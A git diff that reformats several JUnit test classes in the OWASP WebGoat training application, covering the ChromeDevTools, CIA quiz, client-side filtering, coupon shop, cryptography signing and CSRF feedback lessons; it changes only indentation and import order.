  * @since 13/03/19.
@@ -22,28 +20,31 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(SpringExtension.class)
 public class ChromeDevToolsTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new ChromeDevTools());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new ChromeDevTools());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void NetworkAssignmentTest_Success() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/ChromeDevTools/network")
+  @Test
+  public void NetworkAssignmentTest_Success() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/ChromeDevTools/network")
                 .param("network_num", "123456")
                 .param("number", "123456"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", Matchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", Matchers.is(true)));
+  }
 
-    @Test
-    public void NetworkAssignmentTest_Fail() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/ChromeDevTools/network")
+  @Test
+  public void NetworkAssignmentTest_Fail() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/ChromeDevTools/network")
                 .param("network_num", "123456")
                 .param("number", "654321"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", Matchers.is(false)));
-    }
-
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", Matchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java b/src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java
index 9ea02808c..1cf114376 100644
--- a/src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java
@@ -1,5 +1,11 @@
 package org.owasp.webgoat.lessons.cia;
 
+import static org.assertj.core.api.Assertions.assertThat;
+import static org.hamcrest.CoreMatchers.is;
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.plugins.LessonTest;
@@ -7,190 +13,201 @@ import org.springframework.test.web.servlet.MvcResult;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.hamcrest.CoreMatchers.is;
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 /**
  * @author Benedikt Stuhrmann
  * @since 13/03/19.
  */
 public class CIAQuizTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new CIA());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new CIA());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void allAnswersCorrectIsSuccess() throws Exception {
-        String[] solution0 = {"Solution 3"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 4"};
-        String[] solution3 = {"Solution 2"};
+  @Test
+  public void allAnswersCorrectIsSuccess() throws Exception {
+    String[] solution0 = {"Solution 3"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 4"};
+    String[] solution3 = {"Solution 2"};
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/cia/quiz")
                 .param("question_0_solution", solution0)
                 .param("question_1_solution", solution1)
                 .param("question_2_solution", solution2)
                 .param("question_3_solution", solution3))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(true)));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(true)));
-    }
+  @Test
+  public void oneAnswerWrongIsFailure() throws Exception {
+    String[] solution0 = {"Solution 1"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 4"};
+    String[] solution3 = {"Solution 2"};
 
-    @Test
-    public void oneAnswerWrongIsFailure() throws Exception {
-        String[] solution0 = {"Solution 1"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 4"};
-        String[] solution3 = {"Solution 2"};
-
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/cia/quiz")
                 .param("question_0_solution", solution0)
                 .param("question_1_solution", solution1)
                 .param("question_2_solution", solution2)
                 .param("question_3_solution", solution3))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)));
-    }
+  @Test
+  public void twoAnswersWrongIsFailure() throws Exception {
+    String[] solution0 = {"Solution 1"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 4"};
+    String[] solution3 = {"Solution 3"};
 
-    @Test
-    public void twoAnswersWrongIsFailure() throws Exception {
-        String[] solution0 = {"Solution 1"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 4"};
-        String[] solution3 = {"Solution 3"};
-
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/cia/quiz")
                 .param("question_0_solution", solution0)
                 .param("question_1_solution", solution1)
                 .param("question_2_solution", solution2)
                 .param("question_3_solution", solution3))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)));
-    }
+  @Test
+  public void threeAnswersWrongIsFailure() throws Exception {
+    String[] solution0 = {"Solution 1"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 1"};
+    String[] solution3 = {"Solution 3"};
 
-    @Test
-    public void threeAnswersWrongIsFailure() throws Exception {
-        String[] solution0 = {"Solution 1"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 1"};
-        String[] solution3 = {"Solution 3"};
-
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/cia/quiz")
                 .param("question_0_solution", solution0)
                 .param("question_1_solution", solution1)
                 .param("question_2_solution", solution2)
                 .param("question_3_solution", solution3))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)));
-    }
+  @Test
+  public void allAnswersWrongIsFailure() throws Exception {
+    String[] solution0 = {"Solution 2"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 3"};
+    String[] solution3 = {"Solution 1"};
 
-    @Test
-    public void allAnswersWrongIsFailure() throws Exception {
-        String[] solution0 = {"Solution 2"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 3"};
-        String[] solution3 = {"Solution 1"};
-
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/cia/quiz")
                 .param("question_0_solution", solution0)
                 .param("question_1_solution", solution1)
                 .param("question_2_solution", solution2)
                 .param("question_3_solution", solution3))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)));
-    }
+  @Test
+  public void allAnswersCorrectGetResultsReturnsTrueTrueTrueTrue() throws Exception {
+    String[] solution0 = {"Solution 3"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 4"};
+    String[] solution3 = {"Solution 2"};
 
-    @Test
-    public void allAnswersCorrectGetResultsReturnsTrueTrueTrueTrue() throws Exception {
-        String[] solution0 = {"Solution 3"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 4"};
-        String[] solution3 = {"Solution 2"};
+    mockMvc.perform(
+        MockMvcRequestBuilders.post("/cia/quiz")
+            .param("question_0_solution", solution0)
+            .param("question_1_solution", solution1)
+            .param("question_2_solution", solution2)
+            .param("question_3_solution", solution3));
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
-                .param("question_0_solution", solution0)
-                .param("question_1_solution", solution1)
-                .param("question_2_solution", solution2)
-                .param("question_3_solution", solution3));
+    MvcResult result =
+        mockMvc
+            .perform(MockMvcRequestBuilders.get("/cia/quiz"))
+            .andExpect(status().isOk())
+            .andReturn();
 
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.get("/cia/quiz"))
-                .andExpect(status().isOk())
-                .andReturn();
+    String responseString = result.getResponse().getContentAsString();
+    assertThat(responseString).isEqualTo("[ true, true, true, true ]");
+  }
 
-        String responseString = result.getResponse().getContentAsString();
-        assertThat(responseString).isEqualTo("[ true, true, true, true ]");
-    }
+  @Test
+  public void firstAnswerFalseGetResultsReturnsFalseTrueTrueTrue() throws Exception {
+    String[] solution0 = {"Solution 2"};
+    String[] solution1 = {"Solution 1"};
+    String[] solution2 = {"Solution 4"};
+    String[] solution3 = {"Solution 2"};
 
-    @Test
-    public void firstAnswerFalseGetResultsReturnsFalseTrueTrueTrue() throws Exception {
-        String[] solution0 = {"Solution 2"};
-        String[] solution1 = {"Solution 1"};
-        String[] solution2 = {"Solution 4"};
-        String[] solution3 = {"Solution 2"};
+    mockMvc.perform(
+        MockMvcRequestBuilders.post("/cia/quiz")
+            .param("question_0_solution", solution0)
+            .param("question_1_solution", solution1)
+            .param("question_2_solution", solution2)
+            .param("question_3_solution", solution3));
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
-                .param("question_0_solution", solution0)
-                .param("question_1_solution", solution1)
-                .param("question_2_solution", solution2)
-                .param("question_3_solution", solution3));
+    MvcResult result =
+        mockMvc
+            .perform(MockMvcRequestBuilders.get("/cia/quiz"))
+            .andExpect(status().isOk())
+            .andReturn();
 
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.get("/cia/quiz"))
-                .andExpect(status().isOk())
-                .andReturn();
+    String responseString = result.getResponse().getContentAsString();
+    assertThat(responseString).isEqualTo("[ false, true, true, true ]");
+  }
 
-        String responseString = result.getResponse().getContentAsString();
-        assertThat(responseString).isEqualTo("[ false, true, true, true ]");
-    }
+  @Test
+  public void secondAnswerFalseGetResultsReturnsTrueFalseTrueTrue() throws Exception {
+    String[] solution0 = {"Solution 3"};
+    String[] solution1 = {"Solution 2"};
+    String[] solution2 = {"Solution 4"};
+    String[] solution3 = {"Solution 2"};
 
-    @Test
-    public void secondAnswerFalseGetResultsReturnsTrueFalseTrueTrue() throws Exception {
-        String[] solution0 = {"Solution 3"};
-        String[] solution1 = {"Solution 2"};
-        String[] solution2 = {"Solution 4"};
-        String[] solution3 = {"Solution 2"};
+    mockMvc.perform(
+        MockMvcRequestBuilders.post("/cia/quiz")
+            .param("question_0_solution", solution0)
+            .param("question_1_solution", solution1)
+            .param("question_2_solution", solution2)
+            .param("question_3_solution", solution3));
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
-                .param("question_0_solution", solution0)
-                .param("question_1_solution", solution1)
-                .param("question_2_solution", solution2)
-                .param("question_3_solution", solution3));
+    MvcResult result =
+        mockMvc
+            .perform(MockMvcRequestBuilders.get("/cia/quiz"))
+            .andExpect(status().isOk())
+            .andReturn();
 
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.get("/cia/quiz"))
-                .andExpect(status().isOk())
-                .andReturn();
+    String responseString = result.getResponse().getContentAsString();
+    assertThat(responseString).isEqualTo("[ true, false, true, true ]");
+  }
 
-        String responseString = result.getResponse().getContentAsString();
-        assertThat(responseString).isEqualTo("[ true, false, true, true ]");
-    }
+  @Test
+  public void allAnswersFalseGetResultsReturnsFalseFalseFalseFalse() throws Exception {
+    String[] solution0 = {"Solution 1"};
+    String[] solution1 = {"Solution 2"};
+    String[] solution2 = {"Solution 1"};
+    String[] solution3 = {"Solution 1"};
 
-    @Test
-    public void allAnswersFalseGetResultsReturnsFalseFalseFalseFalse() throws Exception {
-        String[] solution0 = {"Solution 1"};
-        String[] solution1 = {"Solution 2"};
-        String[] solution2 = {"Solution 1"};
-        String[] solution3 = {"Solution 1"};
+    mockMvc.perform(
+        MockMvcRequestBuilders.post("/cia/quiz")
+            .param("question_0_solution", solution0)
+            .param("question_1_solution", solution1)
+            .param("question_2_solution", solution2)
+            .param("question_3_solution", solution3));
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/cia/quiz")
-                .param("question_0_solution", solution0)
-                .param("question_1_solution", solution1)
-                .param("question_2_solution", solution2)
-                .param("question_3_solution", solution3));
-
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.get("/cia/quiz"))
-                .andExpect(status().isOk())
-                .andReturn();
-
-        String responseString = result.getResponse().getContentAsString();
-        assertThat(responseString).isEqualTo("[ false, false, false, false ]");
-    }
+    MvcResult result =
+        mockMvc
+            .perform(MockMvcRequestBuilders.get("/cia/quiz"))
+            .andExpect(status().isOk())
+            .andReturn();
 
+    String responseString = result.getResponse().getContentAsString();
+    assertThat(responseString).isEqualTo("[ false, false, false, false ]");
+  }
 } // end class
diff --git a/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java
index b041fac21..fdce4532d 100644
--- a/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringAssignmentTest.java
@@ -1,44 +1,45 @@
 package org.owasp.webgoat.lessons.clientsidefiltering;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFiltering;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
 import static org.mockito.Mockito.when;
 import static org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 /**
  * @author nbaars
  * @since 5/2/17.
  */
 public class ClientSideFilteringAssignmentTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new ClientSideFiltering());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new ClientSideFiltering());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void success() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/clientSideFiltering/getItForFree")
+  @Test
+  public void success() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/clientSideFiltering/getItForFree")
                 .param("checkoutCode", SUPER_COUPON_CODE))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void wrongCouponCode() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/clientSideFiltering/getItForFree")
+  @Test
+  public void wrongCouponCode() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/clientSideFiltering/getItForFree")
                 .param("checkoutCode", "test"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java
index 4b67d534a..7cb34ceb4 100644
--- a/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ClientSideFilteringFreeAssignmentTest.java
@@ -1,47 +1,49 @@
 package org.owasp.webgoat.lessons.clientsidefiltering;
 
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFiltering;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-
 public class ClientSideFilteringFreeAssignmentTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new ClientSideFiltering());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new ClientSideFiltering());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void success() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/clientSideFiltering/attack1")
-                .param("answer", "450000"))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+  @Test
+  public void success() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/clientSideFiltering/attack1").param("answer", "450000"))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void wrongSalary() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/clientSideFiltering/attack1")
-                .param("answer", "10000"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is("This is not the salary from Neville Bartholomew...")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+  @Test
+  public void wrongSalary() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/clientSideFiltering/attack1").param("answer", "10000"))
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is("This is not the salary from Neville Bartholomew...")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void getSalaries() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/clientSideFiltering/salaries"))
-                .andExpect(jsonPath("$[0]", Matchers.hasKey("UserID")))
-                .andExpect(jsonPath("$.length()", CoreMatchers.is(12)));
-    }
+  @Test
+  public void getSalaries() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.get("/clientSideFiltering/salaries"))
+        .andExpect(jsonPath("$[0]", Matchers.hasKey("UserID")))
+        .andExpect(jsonPath("$.length()", CoreMatchers.is(12)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java
index 0ac9cade0..b9ba65a95 100644
--- a/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/clientsidefiltering/ShopEndpointTest.java
@@ -22,21 +22,20 @@
 
 package org.owasp.webgoat.lessons.clientsidefiltering;
 
+import static org.hamcrest.Matchers.is;
+import static org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.clientsidefiltering.ShopEndpoint;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.hamcrest.Matchers.is;
-import static org.owasp.webgoat.lessons.clientsidefiltering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 /**
  * @author nbaars
  * @since 5/2/17.
@@ -44,38 +43,45 @@ import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standal
 @ExtendWith(SpringExtension.class)
 public class ShopEndpointTest extends LessonTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        this.mockMvc = standaloneSetup(new ShopEndpoint()).build();
-    }
+  @BeforeEach
+  public void setup() {
+    this.mockMvc = standaloneSetup(new ShopEndpoint()).build();
+  }
 
-    @Test
-    public void getSuperCoupon() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/clientSideFiltering/challenge-store/coupons/" + SUPER_COUPON_CODE))
-                .andExpect(jsonPath("$.code", CoreMatchers.is(SUPER_COUPON_CODE)))
-                .andExpect(jsonPath("$.discount", CoreMatchers.is(100)));
-    }
+  @Test
+  public void getSuperCoupon() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get(
+                "/clientSideFiltering/challenge-store/coupons/" + SUPER_COUPON_CODE))
+        .andExpect(jsonPath("$.code", CoreMatchers.is(SUPER_COUPON_CODE)))
+        .andExpect(jsonPath("$.discount", CoreMatchers.is(100)));
+  }
 
-    @Test
-    public void getCoupon() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/clientSideFiltering/challenge-store/coupons/webgoat"))
-                .andExpect(jsonPath("$.code", CoreMatchers.is("webgoat")))
-                .andExpect(jsonPath("$.discount", CoreMatchers.is(25)));
-    }
+  @Test
+  public void getCoupon() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.get("/clientSideFiltering/challenge-store/coupons/webgoat"))
+        .andExpect(jsonPath("$.code", CoreMatchers.is("webgoat")))
+        .andExpect(jsonPath("$.discount", CoreMatchers.is(25)));
+  }
 
-    @Test
-    public void askForUnknownCouponCode() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/clientSideFiltering/challenge-store/coupons/does-not-exists"))
-                .andExpect(jsonPath("$.code", CoreMatchers.is("no")))
-                .andExpect(jsonPath("$.discount", CoreMatchers.is(0)));
-    }
-
-    @Test
-    public void fetchAllTheCouponsShouldContainGetItForFree() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/clientSideFiltering/challenge-store/coupons/"))
-                .andExpect(jsonPath("$.codes[3].code", is("get_it_for_free")));
-    }
+  @Test
+  public void askForUnknownCouponCode() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get(
+                "/clientSideFiltering/challenge-store/coupons/does-not-exists"))
+        .andExpect(jsonPath("$.code", CoreMatchers.is("no")))
+        .andExpect(jsonPath("$.discount", CoreMatchers.is(0)));
+  }
 
+  @Test
+  public void fetchAllTheCouponsShouldContainGetItForFree() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.get("/clientSideFiltering/challenge-store/coupons/"))
+        .andExpect(jsonPath("$.codes[3].code", is("get_it_for_free")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java b/src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java
index 4e46cc406..51686debf 100644
--- a/src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java
@@ -1,33 +1,33 @@
 package org.owasp.webgoat.lessons.cryptography;
 
-import lombok.extern.slf4j.Slf4j;
-import org.junit.jupiter.api.Test;
-
-import javax.xml.bind.DatatypeConverter;
-import java.security.KeyPair;
-import java.security.PrivateKey;
-import java.security.interfaces.RSAPublicKey;
-
 import static org.junit.jupiter.api.Assertions.assertTrue;
 import static org.junit.jupiter.api.Assertions.fail;
 
+import java.security.KeyPair;
+import java.security.PrivateKey;
+import java.security.interfaces.RSAPublicKey;
+import javax.xml.bind.DatatypeConverter;
+import lombok.extern.slf4j.Slf4j;
+import org.junit.jupiter.api.Test;
+
 @Slf4j
 public class CryptoUtilTest {
 
-	@Test
-	public void testSigningAssignment() {
-		try {
-			KeyPair keyPair = CryptoUtil.generateKeyPair();
-			RSAPublicKey rsaPubKey = (RSAPublicKey) keyPair.getPublic();
-			PrivateKey privateKey = CryptoUtil.getPrivateKeyFromPEM(CryptoUtil.getPrivateKeyInPEM(keyPair));
-			String modulus = DatatypeConverter.printHexBinary(rsaPubKey.getModulus().toByteArray());
-			String signature = CryptoUtil.signMessage(modulus, privateKey);
-			log.debug("public exponent {}", rsaPubKey.getPublicExponent());
-			assertTrue(CryptoUtil.verifyAssignment(modulus, signature, keyPair.getPublic()));
-		} catch (Exception e) {
-			log.error("signing failed", e);;
-			fail();
-		}
-	}
-
+  @Test
+  public void testSigningAssignment() {
+    try {
+      KeyPair keyPair = CryptoUtil.generateKeyPair();
+      RSAPublicKey rsaPubKey = (RSAPublicKey) keyPair.getPublic();
+      PrivateKey privateKey =
+          CryptoUtil.getPrivateKeyFromPEM(CryptoUtil.getPrivateKeyInPEM(keyPair));
+      String modulus = DatatypeConverter.printHexBinary(rsaPubKey.getModulus().toByteArray());
+      String signature = CryptoUtil.signMessage(modulus, privateKey);
+      log.debug("public exponent {}", rsaPubKey.getPublicExponent());
+      assertTrue(CryptoUtil.verifyAssignment(modulus, signature, keyPair.getPublic()));
+    } catch (Exception e) {
+      log.error("signing failed", e);
+      ;
+      fail();
+    }
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java b/src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java
index 75fa827fd..fdc1d5cb3 100644
--- a/src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java
@@ -22,55 +22,57 @@
 
 package org.owasp.webgoat.lessons.csrf;
 
-import org.hamcrest.core.StringContains;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.csrf.CSRF;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.http.MediaType;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import javax.servlet.http.Cookie;
-
 import static org.hamcrest.core.Is.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import javax.servlet.http.Cookie;
+import org.hamcrest.core.StringContains;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.http.MediaType;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 /**
  * @author nbaars
  * @since 11/17/17.
  */
 public class CSRFFeedbackTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new CSRF());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new CSRF());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
